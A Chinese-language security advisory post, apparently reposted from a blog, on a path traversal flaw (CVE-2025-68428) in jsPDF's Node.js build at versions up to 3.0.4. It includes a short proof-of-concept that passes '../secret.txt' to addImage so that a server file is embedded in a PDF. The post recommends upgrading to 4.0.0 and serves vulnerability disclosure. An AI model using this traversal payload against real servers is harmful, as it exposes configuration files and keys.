文章总结： jsPDFNode.js版<=3.0.4的loadFile、addImage等方法未过滤路径遍历，攻击者可利用../读取任意文件并嵌入PDF，官方已在>=4.0.0修复，建议立即升级并校验路径。 综合评分： 88 文章分类： 漏洞分析,WEB安全,代码审计,漏洞POC,Node.js安全

【已复现】jsPDF 本地文件包含/路径遍历 (CVE-2025-68428)

原创

whoami0002

SecurityPaper

2026年1月6日 15:07 中国香港

漏洞描述

此漏洞源于 jsPDF (Node.js 构建版) 的部分方法（loadFile, addImage, html, addFont）未对用户传入的文件路径进行严格的过滤与校验。远程攻击者可构造包含路径遍历序列（如 ../）的恶意请求，绕过预期的资源目录限制，读取服务器上的敏感文件（如配置文件、密钥等），并将文件内容嵌入到生成的 PDF 文档中。

漏洞影响

受影响的版本<=3.0.4

已打补丁的版本版本 >=4.0.0

漏洞复现

漏洞POC

import { jsPDF } from "jspdf";

const doc = new jsPDF();

doc.addImage("../secret.txt", "JPEG", 0, 0, 10, 10);
doc.save("test.pdf");

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：SecurityPaper whoami0002《【已复现】jsPDF 本地文件包含/路径遍历 (CVE-2025-68428)》